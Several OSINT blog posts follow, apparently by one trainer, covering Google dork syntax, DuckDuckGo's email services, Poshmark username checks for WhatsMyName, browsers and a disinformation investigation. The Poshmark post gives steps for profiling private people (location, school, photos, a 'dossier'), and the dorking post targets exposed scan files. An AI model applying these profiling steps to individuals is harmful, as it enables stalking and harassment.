The technique, pioneered by Johnny Long, Bill Gardner, Alrik van Eijkelenborg, Ed Skoudis, and Justin Brown was the subject of three books, the last being published in 2015. It also existed in a web-based database until Johnny turned over control to Exploit-DB when he went on a year-long mission trip. It now exists here. Johnny also presented the topic at Black Hat EU 2005.

What exactly is Google Dorking?

As the subtitle suggests, it merely consists of 2 things:

1. Speaking the language of the search engine

2. Asking the question in the most favorable way to the search engine (not WHAT you ask, but HOW you ask it)

Speaking the Language

Search engines, whether Google, Bing, DuckDuckGo, or Yandex are nothing more than the implementation of an algorithm. The intention of the algorithm is to provide the most relevant and engaging results to the user in the fastest possible time. The motives and monetization structure of the company running the search engine may also affect the algorithm, but it’s largely the ability to quickly and accurately comb through their index. This is why many search engine companies invest heavily in Data Science, specifically Natural Language Processing (NLP).

Think of it this way: Speaking English or Arabic to order food in France may work for you. In some parts of Paris, especially. In some of the more remote places, not as much. Taking the time to learn part of the language and at least attempting can pay massive dividends.

How to Ask the Questions

I typically equate this to asking a toddler what they want for lunch. Simply ask them and you have no boundaries as to what they are going to say. Limit it to a peanut butter sandwich or a tuna sandwich and you’ll get better results, although still some wild combinations.

For this, each search engine has its own “language.” Using Google’s language is known as Google Hacking or Google Dorking. Intel0logist has curated a nice StartPage of Search Engine resources, including dorks and syntax for many search engines available here.

For the purpose of this post, I will share some of my favorite Google dorks and explanations of how to use them.

• intext: This is my universal favorite. I use it to search for people, Google tracking codes, cryptocurrency addresses, and more!

• ext: or filetype: I like to use this to find files that probably shouldn’t be on the internet in addition to looking for NMAP scan results (filetype:nmap or filetype:gnmap) and Google Earth KML files (ext:KML).

• inurl: and intitle: I like to use these in enumerating login pages and sensitive directories.

• related: Logic would have this dork enumerating subdomains and other related properties. Nope. It is very useful in enumerating competitors.

• site: Limits the scope of the search to a particular site or domain.

• link: Finds links to a page. Useful in finding fraudulent and cloned pages.

These are amplified through the use of Boolean Logic:

• AND (+)

• OR (|)

• NOT (-)

• * (wildcard)

• ““ (precise phrase)

Examples:

• “Peanut Butter” AND Jelly

• “butter” AND jelly -peanut

• (Peanut | Almond) Butter AND jelly

• “Peanut Butter Sandwich” OR “Tuna Sandwich”

Conclusion

This is the tip of the iceberg. There are many ways you can go about employing Dorking. Take a look at Exploit-DB’s GHDB to develop your own ways to chain dorks together to find what you’re looking for. As with anything related to OSINT and Intelligence, keep in mind that these could change at any time with little to no notice. Focus on developing the techniques before touching any tools. Tools may come and go, often faster than techniques become obsolete. If you want to learn more about search engine intelligence, consider taking The OSINTion’s Alternative and Advanced Search Engine Intelligence (AASEI) course.

Background

As some of you may know, Spread Privacy, the parent company of the DuckDuckGo search engine, announced on 20 July 2021 two new services. The first is similar to the disposable email addresses akin to MySudo, Temp Mail, and others. The other, and a larger threat to privacy, in my opinion, is an “Email Tracker Removal Service.”

Posts about this have been circulating through my various social media feeds this week and as I reviewed the press release and associated documentation with a skeptical lens, it created more questions than answers. This particular post is, in a way, me thinking “out loud,” but also asking difficult questions openly to DuckDuckGo regarding the services.

Disclaimer

I am not a lawyer, nor have I played one on Broadway, Saturday Night Live, or any Netflix shows. I am not writing this as legal advice, but rather from the lens of someone concerned with privacy with some background in the IT compliance field, albeit a few years ago.

While the above disclaimer is mostly a joke, I am definitely not a lawyer!

My Thoughts and Analysis

Disposable Email Addresses

Seeing as the press release included the domain of duck.com, this service ma[g1] y have a limited shelf life for its intended use. In an era where social media platforms actively prevent people from registering fake accounts (or sock puppets), I suspect that this will have a similar fate. I learned this a few years ago while creating a Facebook account with a MySudo email address.

There is an incentive for platforms to ensure that users are inputting real information. In some cases, this is from government oversight, such as with US-focused cryptocurrency exchanges and social media platforms. The latter has come under intense scrutiny for their part in disinformation spreading and its possible election influence. Furthermore, such platforms are seeking to sell user data while also realizing that they cannot market such data originating from false accounts.

DDG’s duck.com disposable email service seems decent from the technology perspective on the surface, but given my experiences with similar services and products, I doubt that I will use duck.com much, if at all.

Email Tracker Removal Service

About email trackers: Simply put, email trackers are elements of code quietly included in emails to see if an email is opened or forwarded. Some trackers can ascertain the IP address, hostname, or username of who opens the emails.

Most often, this is completed with a “tracking pixel,” which is a 1x1 pixel (blank image) that phones home to a server when the email is opened. Per engadget’s post about the service, these trackers can be used for targeted ads as well.

The Email Tracker Removal service is the one that I am most concerned with. Maybe I am too pessimistic, but I feel like DuckDuckGo is over-emphasizing the word "save." "Not saving" is only saying that nothing is directly left behind, which is a rather strange semantic point. Their stance on "not saving" is not much different from running Natural Language Processing (NLP) algorithms across the bodies of the emails or something similar. Someone can do a lot with a file (such as an email) without saving it. Maybe my worldview is too dystopian.

I like DuckDuckGo’s search engine, but without any inside or direct knowledge of their service/product, I am inclined to suspect that there are other motives at play here that aren't quite apparent yet. As with any company, DuckDuckGo can only go so long doing things out of "the goodness of their hearts" without *something* from users in return.

Most importantly, how will DuckDuckGo apply this to End to End Encrypted (E2E) emails?

Before thoroughly reading their press release, I was going to ask, "should we trust them with our private keys to be able to decrypt emails to remove any trackers in the body?"

But I now see that this is an email forwarding service. Does DuckDuckGo plan on monetizing the statistics from inbounds? They say that they're not reading emails, but how can they entirely remove all trackers without SOME level of parsing? Parsing would require a human or automated process to "read" the body and any attachments.

Reading the DuckDuckGo Privacy Guarantees, I may be going too deep into this, but their chosen phrasing is questionable, that’s for sure.

1. "We do not save your emails."

Privacy Guarantee doesn't mention reading (whether by human or code) and anything prohibiting any analysis - whether analyzing the text, content, or sender/recipient. Stating that something is not saved is different from saying that it is “Zero-Knowledge” or not read, analyzed, or otherwise manipulated. I get that the point of the service is not “Zero-Knowledge.” Still, a lot of the userbase of DuckDuckGo is more privacy-focused than the "average bear," and the company has massively embraced this as part of its overall marketing strategy.

2. "When using this service, the only personal information we save is your forwarding email address and the duck addresses you create."

I don't see a whole lot wrong with this. Given what this service is and how it works, this would be a requirement for it to work, but it also reduces a user's privacy posture in that it could be another data point to be "requested" via legal processes.

It is also important to note that DuckDuckGo is based in Paoli, PA, per the footer of their About page. This location presents privacy concerns in and of itself in contrast to mail services outside the US and the 5, 9, and 14 eyes countries and cooperators like Tutanota and ProtonMail.

3. "We do not use your personal information for advertising or any other purposes unrelated to this service."

Aside from identifiers like name, email address, and IP address, what are they defining as "personal information?" This statement is something that seems to be deliberately vague and likely up to varied legal interpretations.

4. "We will only disclose personal information if we are legally forced to do so, and we will go to court to fight against such disclosure."

This statement is kind of addressed in the Privacy Policy for DDG in general (since one is not available for the Email Tracker Removal service itself at this time). Per the privacy policy for the search engine, DuckDuckGo doesn’t use cookies by default, but searches are stored and in some cases, affiliate links are added to search results for a commission. While the aforementioned statement is geared to the search engine, would DuckDuckGo do the same to the content of emails? I think in the absence of a more comprehensive statement or policy, the jury is out on this one.

5. "We do not use third-party email services to forward your email."

Cool, but has anyone audited these claims? Does the software that runs the service use any external libraries? This is undoubtedly an instance where I would like to see audit results or a pen test report. Building your own software can be rewarding but is not without its own plethora of issues.

6. "We protect our infrastructure and your personal information with strict technical and organizational controls."

This passage in the policy primarily addresses encryption and agreements with data processors. I would venture to guess that this may be on par with other search engines, but I need more information and context before feeling comfortable routing email through this.

7 & 8. Deals with support and account deletion requests.

Nothing to say about these points. Seems fine.

9. "We will not allow an ownership change to weaken these privacy guarantees."

This statement looks excellent on paper but is not enforceable AFTER a sales transaction is complete.

Finally, the Email Tracker removal Service seems to require a mobile application. While not all mobile applications are evil, as we have observed with other platforms (namely social media), they do tend to collect "anonymized" data from user devices. I have a certain level of skepticism for this claim, and (maybe it's my inner conspiracy theorist speaking, but) it does make my "spidey senses" tingle a bit.

Conclusion

In theory, these new services from DuckDuckGo seem to be decent enough services, but I do not fully trust the provided information given the context. I think that further clarification is required. Given that these are free services, the old adage probably applies:

If you aren't paying for the product, you ARE the product.

Sign up now so you don’t miss the first issue.

Subscribe now

In the meantime, tell your friends!

I was tossing around ideas for a blog about Poshmark. My first inclination was to check Micah Hoffman’s WhatsMyName tool (also available as Profiler in Recon-ng and as a Web Application). The tool had no support for Poshmark. I am a curious person, and I like to give back to the community. So, naturally, I thought about how I could automate the checks for the closet’s existence. Note: Closet is the term Poshmark uses for sellers and their available inventory.

Another note: 100% of these techniques are UNAUTHENTICATED. When doing the same analysis with a logged-in account, nothing changes.

Building the Automation

Initial Scenario

I use WhatsMyName quite frequently, so I am familiar with the general way that the application works. Sites are assembled in a JSON file that the Python script iterates over and does the checks for the sites, minding the HTTP code (200, 300, 404, etc.) and a string that is displayed in the response if an account exists or not. The script will then display on the screen whether it exists or not.
My downfall is that I was not intimately familiar with where to get the strings to verify the existence or conclude a lack of existence. To accomplish this, I copied the original WhatsMyName Python script (web_accounts_list_checker.py). I read through the code to the point where I found where the script’s logic checks for the code and the string. The part of the code where this occurs is around line 209 and reads as:

# Analyze the responses against what they should becode_match = r.status_code == int(site[‘account_existence_code’])string_match = r.text.find(site[‘account_existence_string’]) >= 0

Finding Strings for Verification

I added another line to print the output of the variable r to see what is returned:

# Analyze the responses against what they should becode_match = r.status_code == int(site['account_existence_code'])string_match = r.text.find(site['account_existence_string']) >= 0print(r.text)

I searched around the site for accounts that did and did not exist (Hello Bob, Alice, and C_3PJoe). Once I determined which ones existed and did not, I reran the code. Here is the censored output of a valid user:

Here is the censored output of a non-existent user:

As we can see, a valid page says “<username> or <Real Name> is using Poshmark to sell items from their closet,” whereas we see “Page Not Found — Poshmark” if there is no user by that name. Now, to verify the HTTP codes.

Checking HTTP Codes

Next, we have to check the HTTP codes to input them into WhatsMyName. I found https://httpstatus.io/ as an easy website to do it in one single transaction for both accounts.

Instead of using my current browser for the user-agent string, I changed it to Firefox Desktop because I noticed that theheader variable in the code for WhatsMyName is set to that user-agent string. At the bottom, we see that the valid account has an HTTP 200 code and, the non-existent account has a 404.

Now, we need to edit the web_accounts_list.json file.

},{         "name" : "Poshmark",         "check_uri" : "https://poshmark.com/closet/{account}",         "account_existence_code" : "200",         "account_existence_string" : " is using Poshmark to sell items from their closet.",         "account_missing_string" : "Page not found - Poshmark",         "account_missing_code" : "404",         "known_accounts" : ["alice","bob"],         "category" : "shopping",         "valid" : true      }

Now when we run the code, the script will check Poshmark.

I did some analysis using friends’ accounts that are both sellers and buyers. Even if a person is only a buyer, they are still listed as having a closet.

As of August 24, this is included in the WhatsMyName script, the Profiler module in Recon-ng, and the Web Application.

Further Poshmark OSINT

As I was probing around the Poshmark site to solve the problem from the previous section, I came across some other things of interest to an OSINT investigator.

Google Dorking

First, after we have positive confirmation of the username, if we use the Google Dork of site:poshmark.com <user name>, we can see what they are mentioned in or have commented on. Below is a screenshot with all usernames and identifying information obscured. The black boxes are where the user name I searched for appear in the results.

While this is somewhat trivial, it can help us build a dossier on someone’s spending habits, fashion taste, and other things.

Harvesting other user info

Next, we will do the somewhat obvious. We will analyze the username (using tools like WhatsMyName, NameChk, and Sherlock). Furthermore, depending on what the user has on their profile, we may be able to ascertain the following:

• Location

• Last login time (derived from last comment or post)

• School/College/University

• Website

• Clothing sizes (unless they are doing Poshmark as a business)

• Possible pictures not shared elsewhere

Given these data vectors, we can extract information from the following:

• Alumni Associations

• People Search Engines (i.e. FamilyTreeNow, TruePeopleSearch, FastBackGroundCheck, and FastPeopleSearch) then move to public, voter, or property records

• Web technologies and email addresses

• Reverse image searches

• General news in a specific area

• Other social media platforms

This is a point where the possibilities are near-endless. This could be the goldmine we seek, especially if the person has little concept of OPSEC or privacy.

Shipping Labels

The final source of intelligence from Poshmark is their shipping labels. While I know some information is required to ensure delivery. The main part that I take issue with is the username. There is no reason for this to be on the labels. An adversary that sees this posted online or handles mail or packages could use the same techniques discussed above to stalk, harass, or harm a buyer solely using the label.

I frequently encourage people to avoid using the same username everywhere — just like with passwords. But, as with passwords, it often falls on deaf ears. There’s nothing wrong with populating the username across multiple websites; I discourage actually using the name on all sites for real accounts. From an OPSEC perspective, feel free to register the username then populate it with garbage data. Be on the lookout for a blog about that in the future.

Conclusion

In conclusion, this was a great learning experience. Furthermore, it proves that we can scrape intelligence out of almost any resource. There are definitely things that I would like to see changed with Poshmark, but for now, I will enjoy the ride and the source of OSINT.

The purpose of this article is more than just “patch your browser and use a VPN.” Both concepts are important to the cause, but they are not infinite. In theory, both a Lamborghini and a Pinto can get you from point A to point B. The difference is within the experience, bells and whistles, and reliability. Modern browsers can get us to almost any website reliably, so that is a given. Whether anyone else has access to seeing us reliably get to a website is a different story — that is the intent behind Tor browser.

I will be honest, I am not a fan of Safari and even less of a fan of IE/Edge. I like Mozilla’s Privacy Promise, but Chrome (to me) feels more sleek, streamlined, and efficient. That being said, Chrome is a Google product, so it is a reasonable assumption to deduce that some usage data is sent back to the mothership. Firefox is open-source, Chrome is not. There are some plugins/extensions only available for one or the other (i.e. Hunch.ly) that warrants using Chrome.

Like with anything OSINT related, I double down on getting multiple opinions, so I like to use multiple browsers. Recently, I was introduced to Brave. It’s open-source and built on Chromium, so I could replicate that Chrome experience. I was almost immediately enamored. Bonus points, Hunch.ly works on Brave.

Comparison and Contrast of Browsers

In the section below, I will compare and contrast the browsers. I am leaving Tor off since it will fall under a different list ;-)

Chrome

Chrome is sleek and acts as a well-oiled machine. The main issue I have with it is that it seems to ‘listen’ a little too much. The availability of extensions for various types of tasks and capabilities makes Chrome a formidable competitor.

Firefox

Firefox is open source and comes from Mozilla, which evangelize their Privacy Promise. The main drawback in my opinion is the limited plugins available for the platform and that it doesn’t seem to be as fast as Chrome or the Chromium derivatives (Brave and Vivaldi).

While it is minor for me since I use Hunch.ly and Monosnap, Firefox does have a built-in screenshot tool. Also, a minor issue for me, is that Firefox has a built-in master password in addition to the password manager, whereas Brave and Chrome do not. I use an independent password manager that works with all browsers, so I don’t really care about this feature.

I haven’t put it to the test in a while, but I was able to use procdump to dump Firefox and extract passwords for a demonstration for a talk. in the past couple of years. I have not tested this recently in Firefox or other browsers, but as of 2016, using the browser’s password manager was not a good idea.

Brave

My current favorite browser. Based on the open-source Chromium. Has support for all of the Chrome extensions that I have attempted to use. Brave blocks ads and trackers, seemingly better than Firefox. I also have a PiHole running — but it mostly addresses ads.

This is a legitimate concern for me, but the PiHole will stop some of the threats and could stop more if I could find the time to enhance the ruleset. I plan on upgrading to a dual security appliance setup of a pfSense and Ubiquiti Security Gateway.

In about a month, I have saved some time and hassle in using Brave.

Vivaldi

Vivaldi is based on Opera, or at least some of the key people overlap. I have just installed it but haven't used it. It seems to have promise and be comparable to Brave, but the jury is out. Other writeups comparing the two put them on near parity. One major drawback, in my opinion, is that Vivaldi lacks the inherent ad blocking capabilities and sends some telemetry data back to the mothership.

Other writeups:

Slant - Vivaldi vs Brave detailed comparison as of 2020
When comparing Vivaldi vs Brave, the Slant community recommends Vivaldi for most people. In the question "What are the…www.slant.co

Brave vs. Vivaldi: Which Browser Is Better and Why | TechWiser
Brave is a blockchain-based browser that claims to be faster than others. They block all ads by default and have an…techwiser.com

IE/Edge

One of my favorite cynical jokes is “What is the best part of Internet Exporer?” Using it to download Firefox or Chrome. All jokes aside, Edge allegedly improves what Internet Explorer was. Being entirely honest, I don’t use Windows enough to speak one way or another. During investigations, there are good reasons for using Edge, for the user agent string and in cases where the IE/Edge site is different than the others, or restricted only to Edge. The caveat and rebuttal to that is that there are user-agent string changing tools, plugins, and extensions to bypass this though. Moreso on the negative side, there are few protections from trackers, ads, and cookies.

Safari

Safari is only available on Apple products. It was deprecated in Windows about 4–5 years ago, so it is a niche browser. It has a lot of the same qualities as Edge in terms of user-agent strings in addition to sharing the same frustrations with trackers, ads, and cookies.

Plugins and Extensions

I am not going to rehash the best plugins for OSINT and OPSEC as Null Byte has already adequately covered the topic. I will speak to the plugins and extensions that I do use on Chrome, Firefox, and Brave.

Chrome and Brave

I use the following:

• Password Manager (Purposefully Vague)

• Google Translate

• Grammar.ly

• Hunchly

• Privacy Badger

• uBlock Origin

• Go Back in Time (Archive.org)

• EXIF viewer Pro

• Builtwith

• One-Click Video Downloader

• JSON Viewer Awesome

• FB Purity

Firefox

• Password Manager (Purposefully Vague)

• To Google Translate

• AdBlock Plus

• Privacy Badger

• uBlock Origin

• Facebook Container

• EXIF viewer

• JSONovich

• User-Agent Switcher

• BuiltWith

Conclusion

In conclusion, there are no absolutes. In OSINT and OPSEC, we must take steps to blend in. This survey of browsers is intended as a starting point for research and implementation based on your appetite for risk. Using one browser or another should not augment other sound advice including the use of VPNs, Encryption, Patch Management, Sock Accounts, and other tools and techniques. Your mileage may vary and as always, I am available for discussion if you have questions or concerns.

I have been teaching virtual and in-person OSINT courses for about the last 6 months as The OSINTion. When going through the tools, I have always gone out of my way to provide credit where it is due to the tool developers and researchers behind the tools. One tool in particular that stuck out to me is Datasploit. The tool is written by Shubham Mittal and his team at RedHunt Labs. I have been an adherent of the tool since I learned that OSINT was, well…OSINT (h/t to Justin Seitz for that). I am also a huge fan of Tim Tomes’ Recon-ng.

Why am I giving this back story?

Well, as many of you know, I am trying to improve my Python skills. I am working on a disinformation and deception tool, tentatively called DECEPTICON, as well as some other cool tools. All of this is part of my hobby-time Infosec and not part of my day job.

After having a bad training session — nothing went right. I set out to write some new scripts and provide my own datasets to students instead of relying on outside entities — I know, I should've been doing that already. Anyways, I wrote a parser for some data types in some quasi-authentic files. Take my NEW and IMPROVED REGEX course (next classes are 4/25 and 5/2 — use WOSEC15, SAFEESCAPE15 or TRACELABS15 for 15% off) for access to the tool. :-)

After I finished that (and learned a thing or two, thanks to Kelso), I got to thinking about ways to help give back to the Infosec/Hacker and OSINT communities. I decided that I would write a tool with similar functionality to the module of Datasploit, but I would write it in Python3 and follow Micah Hoffman’s approach to creating a tool and a Recon-ng module that is near identical.

Back to the tooling, the reason I continue to teach about Datasploit despite some of the features not working is that aside from Spiderfoot, to date, Datasploit is the only OSINT tool (to my knowledge) that queries WikiLeaks. Perhaps, I could write a tool and module that replicate the functionality of the Datasploit module. I did a few manual queries on WikiLeaks and then took a look at the code of Datasploit and confirmed that the URLs were the same.

Where I am putting my own twist to the code is my use of Pandas to handle the various data points that I am collecting. It may be because of the research I am doing with Data Science, but I find Pandas to make referencing data as well as importing/exporting structured data to be simple.

So, here we are. This is the release of WikiLeaker. Here is the GitHub repo. Installation instructions are on the README page of the repo. Simplying execute the script and pass a domain as an argument and anything containing that domain on WikiLeaks will populate to your screen.

I also included the Recon-ng module in the GitHub repo. The difference in Recon-ng is that you get all the functionality above, but it also writes the output to the Contacts database, as it parses email addresses using XPaths instead of re and pandas. It is available in the Recon-ng Marketplace.

In conclusion, seek forth and conquer. Use this tool to your heart’s content, but be safe (Safety Third) and do not do anything illegal/stupid.

As the world continues to battle the COVID-19 pandemic, some outlets are sharing samples of malware, while others are trumpeting politically biased information from both sides of the proverbial aisle, frequently perpetuating biased information as solid truth. This biased information could be disinformation, depending on the motive and subjectively, the severity. Alternatively, accidental omissions or inclusions of inaccuracies without ill-intent is misinformation. For this text, we will refer to biased media reporting from mostly-mainstream sources as politically biased information. I am focusing on disinformation.

The primary difference between the two is that disinformation is more deliberate, with motives seeking to cause more harm, hate, distrust, and doubt. In contrast, biased reporting presents an opinion or point of view as fact. Politically biased reporting can cross the line of disinformation, but this article has a specific focus outside that of mainstream and/or reputable media sources.

As we know, some nation-states and threat actors will “Never let a good crisis go to waste,” and this pandemic is no different. MalwareHunterTeam has shared a few instances of COVID-19 related malware.

While I am interested in malware, I do not possess all the technical expertise and tools to analyze them. From the same lens, I do spend a lot of time on the internet, more specifically, social media. I am connected to/friends with a lot of people outside the technology industry that are not as savvy for hoaxes and disinformation. I try to watch what they post and share and identify trends relative to disinformation and true Fake News, not just things that contradict what any specific elected official, politician, or party disagrees with and dubs as Fake News.

When COVID first gained the attention of the masses and stay at home orders were proposed, I said to myself, “There are going to be two things that come from this: Ambulance Chasers and Threat Actors.” I am surprised at the direction that this went.

Within the last week or so, I have observed an influx of stories shared from people that link to one of my favorite internet resources, especially from the lens of Open Source Intelligence (OSINT), and that is The Internet Archive (archive.org.) From Wikipedia, ‘The Internet Archive is an American digital library with the stated mission of “universal access to all knowledge.”’

I have observed links to direct disinformation campaigns being shared on social media with links to the Internet Archive. At first, I scoffed it off then began to see a pattern. Below is the analysis.

Sample 1

Starting with the first sample I saw, let’s take a look. Here is the link being shared:

Covid-19 had us all fooled, but now we might have finally found its secret.
In the last 3–5 days, a mountain of anecdotal evidence has come out of NYC, Italy, Spain, etc. about COVID-19 and…web.archive.org.

Here is what we see by clicking the link:

Disclaimer: I am not a doctor or a trained medical, pharmaceutical, or chemistry professional. This analysis is from the perspective of language and the methods by which this article is shared on the internet.

In evaluating this article, there is no single link to anything, much less a reputable source or medical journal. A user on YCombinator pointed out that the author responded to criticism about failing to link any material with “I’m not an academic so f**k all that citation waste of time”. The language of the section is written to the layperson initially but then starts to pick up in the use of medical terminology. As we scroll down in the subject sample, we see this:

The language used here is not that of someone in the medical or chemistry fields. The statement that Hydroxychloroquine is an advanced descendent of regular old Chloroquine is false. The difference is the chemical makeup. Hydroxychloroquine has the same composition as Chloroquine with an additional Oxygen atom (C18H26ClN3O for Hydroxycholorquine versus C18H26CIN3). The difference between the two is in the manufacturing of the drugs, not something that occurs organically in nature.

Why is this relevant when discussing disinformation?

Not only is this ‘article’ disinformation, but Medium also took it down and suspended the user (as evidenced below). Note: To test this, remove the archive.org URL up to the https:// that starts the Medium URL.

So, I decided to see what credentials the user has to discuss medicine and COVID. Using OSINT, I was able to find their social media accounts, which I am not going to share in preserving their privacy. This is a censored screenshot of their Twitter:

When I attempted a search on Facebook for the author by name, instead of seeing an account, I was confronted with numerous posts debunking his research, similar to this article. I am embedding one post that is from someone claiming to be a Medical Doctor (MD) with a Master of Science (MSci). A search for her on LinkedIn confirms the information she presents about herself on the Facebook page. I was also able to find her profile on one of the employers that the LinkedIn profile claims to work for, so I rate her as credible.

Here is a picture of the screen I was presented with while searching for the author:

Sample 1 Conclusion:

This piece is written to further a political narrative. The author has no credibility and is deliberately trying to spread disinformation. I am not sure to what end, but some of the posts on Facebook do mention that this is making its rounds on 4Chan. A few Google dorks across 4chan yielded a high number of results of the link to this sample, but no other COVID-19 specific posts, as verified from implementing a filter that excluded results for the sample in question.

Whether the author is the source of spreading the archive.org link or not is undetermined. Using LinkedIn, I was able to identify the author, but I was unable to find any evidence that they are the source of sharing the archive.org link. I was able to ascertain that the author is active in supporting political candidates that may subscribe to the narrative of this sample.

Sample 2

Sample 2 is a lot more complicated. Warning: There is a rabbit hole to fall with this one. From my estimation, this is more likely to come from a state-sponsored actor that Sample 1. There are a lot of moving parts to unpack. Let’s start the same way we did with Sample 1. Here is the link being shared:

21 million Chinese died of coronavirus — US intelligence officials intercept data — Washington Live
A new data intercepted by the United States reveals that 21 million people died in China from December 2019 to March…web.archive.org

Here is what we see by clicking the link:

The portions that are highlighted (less the number of captures in the top left corner) were searched for on the internet in an attempt to find a reputable news source that reports any semblance of this; however, that was unsuccessful. A site that attempts to look like a TV station was identified and will be discussed below. Attempts to verify the information contained in this article were futile, less some of the fundamental facts, such as the parts about facial recognition and the decline in phone users. All sites that had similar statements to this one and none were reputable. I came across another site, similar to the one mentioned above, which will also be discussed below.

When navigating to the live site, I saw this:

First of all, notice the WordPress logo on the tab in the absolute top left corner. Any reputable news site would have their logo instead of WordPress. I would like to say that many large news outlets have their content management system provided by their parent company. Still, it has been almost a year since I wrote for Forbes, and they were on WordPress until a few weeks before I stopped writing for them, although it was branded with Forbes logos.

Next, notice the writing in Vietnamese. According to Google Translate, this is translated into:

Read Vietnamese

Breaking news: The family of three Hanoians died before testing positive for coronavirus

This is not included in the original piece, which indicates that this is being used as a staging ground or template for other similar stories. There is only one author, and all stories are COVID-19 related. Another peculiar thing about this site is that sometimes a full name is in the URL; other times, it is the story ID. This is usually due to a misconfigured CMS like Wordpress.

Let’s take a quick look at WHOIS data to see if that tells us anything.

We see the domain is 41 days old, which is a bit suspect. The WHOIS record indicates that the registrant is using Domain Privacy, but is in the US and that the registrar is Wild West Domains, a subsidiary of GoDaddy, according to their about page.

Getting a little more information from SecurityTrails, we see the domain history for the domain. The current hosting for the domain was opened on March 5, 2020, which corroborates with what we saw from DomainTools. We also see two other IP Addresses that it occupied. The one without a box around it hosts about four other sites that do not load. The one with an arrow pointing at it hosts a Chinese porn site. While the porn site sets off some alarms, it was only hosted there for eight months in 2013 before popping up on the next one in March 2014 for six years.

Pivoting to social media to dig further, I journeyed on the ride of my life. Doing a little bit of research using the verbiage of the story is where this flow gets messy. First, I attempted to search for the author by name, which yielded nothing, which is very suspicious as most reputable journalists have social media platforms and their work email addresses shared for people to send leads to.

Next, I was attempting to fact check the main points by searching in Google and on Facebook. Because aspects of the story came from other sources, this was not very fruitful in determining the validity of the claims. It appears as if every claim is mostly true, but not in the context provided in the story, thus qualifying as disinformation.

Facebook, on the other hand, brought some serious stuff out. I searched for the author’s name there and found a few accounts, but could not pinpoint whether any of them were the person in question. I did, however, note several accounts with near-identical verbiage pushing the ideas of the story through copying and pasting the story as Facebook statuses. Five were public. The picture below shows them.

I decided to see what I could gather from these accounts to see if they were bots or just people who believed the story. One was for ex-pats of one country residing in another. The tone of that post was to try to spread the information, but the people in the comment section were not having it. One of the other accounts lists their phone number in the open. They breed and sell dogs. This same account was consistently sharing conspiracy theory-type stories about COVID-19 and Hydroxychloroquine. A lot of the sources that this user was sharing stories from have been rated as conspiracy theories on MediaBiasFactCheck.com.

I next searched Facebook for the archive.org link. One of these accounts was a little more aggressive than the previous one. They were sharing both the text as a post and the archive.org link to the story. They also shared a Google drive link for a folder with the title of VIRAL, which displayed this (when accessed via a safe system):

Everything else this user shared was from or about a technology firm that “can promote the regeneration of the fabric that has been destroyed by the virus, therefore strengthening immunity is not enough in many cases,” which screams hoax or snake oil.

The next merely shared the link and had nothing else of immediate interest. The next account appeared to be aggressively sharing COVID-19 related articles but in Tamil. I was unable to translate many of the posts since I was trying to avoid downloading all the memes and pictures and run them through an optical character recognition (OCR) reader and then a translator.

Here is precisely where it gets more volatile. One of the other accounts posting the link also posted in Tamil but also mentioned Pakistan frequently. This is odd because one of the accounts that also shared the link claims to be Dr. Gholam Mujaba, a prominent figure in Pakistan with some alleged ties to the US. Due to the Wikipedia page being laden with missing links and accolades such as Co-leader of the top Clash of Clans clan as of 3/26/20, it seems all but impossible to identify if this is a real account. It is not verified, and a LinkedIn with the same name has a lot of the same information, but missing logic and citing things out of place.

Regarding the picture below, the section in the top red box is a common fake copyright notice that makes its way across Facebook from time to time. The terms of service of Facebook negates 100% all of this statement. Under Copy RIGHTS [sic], we see mention of the phrase This FB page, which is rather unprofessional, followed by a Gmail address with Affiliation with the Republican National Convention, USA, despite listing political views as Liberal. I am not trying to split hairs, but the US Republican party tends to refer to themselves as the GOP, rather than the RNC. This seems to be created by someone seeking to cause political turmoil without knowledge of American politics.

Here is the empty link section for Wikipedia. In reviewing the Wikipedia page’s edits as far back as 2008, his page seems to attract vandals and false editors. Many of the accolades and accomplishments that would’ve been known at the times of the edits were added much later. For example, mentions of his Masters in Pharmacology and his Ph.D. were added in May 2018 by an IP Address that belongs to RCN, which is an ISP in the area between Washington DC and Philadelphia as well as New York, Boston, and Chicago, per their website. To be clear, I am not saying that there is not a person by the name of Dr. Gholam Mujtaba with these credentials and accolades. I am saying that I am not 100% convinced that the accounts purporting to belong to him are authentic.

While this account is questionable, one linked to him seems to have more of an agenda in what they are publishing. Pakistan Policy Institute, USA, is an organization that allegedly seeks to help bring US and Pakistan relations to a more equitable position for both countries. Some of the verbiage listed in the About section of the Pakistan Policy Institute, USA Facebook page in conjunction with the link to a registered website with nothing to load, makes me skeptical.

The part in this about the US being Pro-India is awkward. Understanding that India and Pakistan have a tumultuous relationship at best still sets off alarms as to why this person who is affiliated with this organization would be sharing COVID-19 propaganda. Diving a little further into the posts for this page, we see a couple of alarming samples not relevant to COVID.

Admittedly, some of this does not make sense to me. The mention of Germany and the female to bow down on the threshold of non-Allah confuse me. I know this is a rough translation, but I lack the context to know what this has to do with COVID-19. I am unsure as to why New Jersey is mentioned. The final highlighted section seems to be counterproductive to what the About for this group says. This seems very Anti-India, which could be seen as a provocation, which fuels suspicion of a state actor maintaining these pages. The remainder of the posts reviewed were all about COVID-19, and some mentioned his son, who is a doctor in a New York hospital.

Traveling back to searching for phrases in Sample 2 to attempt to verify any validity to the statements led me to another source of disinformation. This site attempts to look like a real news station.

While this looks like a news station, something is noticeably missing: the other journalists. Brandon G. Jones wrote every single article. Clicking his name to see his profile and how to follow him on social media leads us to this:

The URL says abc14news.com/author/bob instead of mentioning Brandon. I put a box where one would expect links to his Twitter, Facebook, and Email address. Attempting to move to the author’s directory to see if any other authors are listed redirects us to an article that starts with the word author. I tried a reverse image search for his picture, but nothing came up. A search for only produced ABC14news materials.

Looking at the WHOIS and hosting history, we see that it is registered through GoDaddy with Domain privacy enabled. A pattern in play since September 2019 shows that the site moves hosting providers about every month or two.

As of the time of writing this, abc14news.com seems to be the only site on the IP address. Previous IP addresses have hosted a wide variety of sites in terms of content and credibility.

It appears as if the modus operandi for ABC14News is to regurgitate Fox News stories but to replace the words with synonyms so as not overtly to plagiarize the work. Take a look at the two links below. View them side by side, and you will see what I mean.

Sanders hit for lackluster record of getting bills passed despite decades in Congress | ABC 14 News
Sen. Bernie Sanders is using a lot more hits from critics who problem regardless of whether the White Dwelling hopeful…abc14news.com.

Sanders hit for lackluster record of getting bills passed despite decades in Congress
Sen. Bernie Sanders is taking more hits from critics who question whether the White House hopeful achieved anything of…www.foxnews.com

Below is an analysis of ABC14News from NewsGuard:

Sample 2 Conclusion:

This piece is pure disinformation and shared via archive.org for malice. While attributing the author was not possible, it seems that it may be motivated by international relations or politics — possibly perpetrated by a state-sponsored actor. Because of all the moving parts with this, it became complex very quickly. There are other rabbit holes to pursue this, but I thought this was a good stopping point for now.

How did this happen?

